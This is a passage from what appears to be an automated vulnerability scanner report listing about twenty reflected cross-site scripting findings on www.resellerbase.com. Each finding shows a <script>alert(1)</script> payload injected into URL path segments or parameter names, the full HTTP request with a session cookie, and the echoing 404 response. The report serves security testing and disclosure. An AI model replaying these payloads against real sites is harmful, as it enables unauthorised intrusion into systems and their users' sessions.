Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/?315d4<script>alert(1)</script>4d9bef640d7=1 was not found on this server.</p>
...[SNIP]...

2.5380. http://www.resellerbase.com/web-service/themes/kosmos/images/folder.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 10bcd<script>alert(1)</script>b97d9e818e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service10bcd<script>alert(1)</script>b97d9e818e9/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service10bcd<script>alert(1)</script>b97d9e818e9/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.5381. http://www.resellerbase.com/web-service/themes/kosmos/images/folder.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3053a<script>alert(1)</script>0510839a106 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes3053a<script>alert(1)</script>0510839a106/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes3053a<script>alert(1)</script>0510839a106/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.5382. http://www.resellerbase.com/web-service/themes/kosmos/images/folder.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 42975<script>alert(1)</script>35519a81506 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos42975<script>alert(1)</script>35519a81506/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos42975<script>alert(1)</script>35519a81506/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.5383. http://www.resellerbase.com/web-service/themes/kosmos/images/folder.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ed3e8<script>alert(1)</script>7823fa08fb5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/imagesed3e8<script>alert(1)</script>7823fa08fb5/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/imagesed3e8<script>alert(1)</script>7823fa08fb5/folder.gif was not found on this server.</p>
...[SNIP]...

2.5384. http://www.resellerbase.com/web-service/themes/kosmos/images/folder.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 135d3<script>alert(1)</script>bbc8601e97c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/folder.gif135d3<script>alert(1)</script>bbc8601e97c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/folder.gif135d3<script>alert(1)</script>bbc8601e97c was not found on this server.</p>
...[SNIP]...

2.5385. http://www.resellerbase.com/web-service/themes/kosmos/images/folder.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/folder.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 79b1a<script>alert(1)</script>25cdd6c090e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/folder.gif?79b1a<script>alert(1)</script>25cdd6c090e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/folder.gif?79b1a<script>alert(1)</script>25cdd6c090e=1 was not found on this server.</p>
...[SNIP]...

2.5386. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0d03<script>alert(1)</script>4b58cb2c4cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviced0d03<script>alert(1)</script>4b58cb2c4cf/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviced0d03<script>alert(1)</script>4b58cb2c4cf/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5387. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3f32a<script>alert(1)</script>41dd630a29b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes3f32a<script>alert(1)</script>41dd630a29b/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes3f32a<script>alert(1)</script>41dd630a29b/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5388. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e5d37<script>alert(1)</script>bddb2844e71 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmose5d37<script>alert(1)</script>bddb2844e71/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmose5d37<script>alert(1)</script>bddb2844e71/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5389. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ec18e<script>alert(1)</script>c692e37f52 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/imagesec18e<script>alert(1)</script>c692e37f52/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/imagesec18e<script>alert(1)</script>c692e37f52/rating/ was not found on this server.</p>
...[SNIP]...

2.5390. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e080a<script>alert(1)</script>18b24a2ef95 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/ratinge080a<script>alert(1)</script>18b24a2ef95/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/ratinge080a<script>alert(1)</script>18b24a2ef95/ was not found on this server.</p>
...[SNIP]...

2.5391. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c0b8f<script>alert(1)</script>9b77e73638d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/?c0b8f<script>alert(1)</script>9b77e73638d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/?c0b8f<script>alert(1)</script>9b77e73638d=1 was not found on this server.</p>
...[SNIP]...

2.5392. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b0324<script>alert(1)</script>f46b13e8f37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceb0324<script>alert(1)</script>f46b13e8f37/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceb0324<script>alert(1)</script>f46b13e8f37/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5393. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a5aa1<script>alert(1)</script>189a6e50b56 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themesa5aa1<script>alert(1)</script>189a6e50b56/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themesa5aa1<script>alert(1)</script>189a6e50b56/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5394. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 561e1<script>alert(1)</script>be319626632 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos561e1<script>alert(1)</script>be319626632/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos561e1<script>alert(1)</script>be319626632/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5395. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 226e5<script>alert(1)</script>a5dafeabfa1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images226e5<script>alert(1)</script>a5dafeabfa1/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images226e5<script>alert(1)</script>a5dafeabfa1/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5396. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 969e4<script>alert(1)</script>586340e675d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating969e4<script>alert(1)</script>586340e675d/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating969e4<script>alert(1)</script>586340e675d/0.gif was not found on this server.</p>
...[SNIP]...

2.5397. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ebe76<script>alert(1)</script>80041d61cd3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/0.gifebe76<script>alert(1)</script>80041d61cd3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/0.gifebe76<script>alert(1)</script>80041d61cd3 was not found on this server.</p>
...[SNIP]...

2.5398. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 35c4a<script>alert(1)</script>38c1838fb7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/0.gif?35c4a<script>alert(1)</script>38c1838fb7a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/0.gif?35c4a<script>alert(1)</script>38c1838fb7a=1 was not found on this server.</p>
...[SNIP]...

2.5399. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/2half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6b68b<script>alert(1)</script>5d087b534d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

